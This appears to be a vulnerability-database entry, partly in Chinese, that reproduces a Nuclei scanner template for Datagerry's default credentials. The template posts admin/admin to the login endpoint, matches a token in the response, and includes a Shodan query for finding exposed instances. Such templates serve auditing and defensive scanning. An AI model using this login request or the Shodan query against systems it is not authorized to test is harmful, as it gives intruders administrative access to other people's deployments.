datagerry-default-login: Datagerry - Default Login

日期: 2025-08-01 | 影响软件: datagerry | POC: 已公开

漏洞描述

Datagerry was using default username and password was discovered.

PoC代码[已公开]

id: datagerry-default-login

info:
  name: Datagerry - Default Login
  author: gy741
  severity: high
  description: |
    Datagerry was using default username and password was discovered.
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"datagerry"
  tags: datagerry,default-login,vuln

variables:
  username: "admin"
  password: "admin"

http:
  - raw:
      - |
        POST /rest/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"user_name":"{{username}}","password":"{{password}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"token":'
          - '"token_issued_at":'
          - '"token_expire":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a00463044022052ecf13838b58cb21dbe60ecbc6b4d48802111df4145c7e787de198c6b1bffb302202a51117108d1a73a405b54efeec14956269d77d8d693b277a19dbed643db0335:922c64590222798bb761d5b6d8e72950

相关漏洞推荐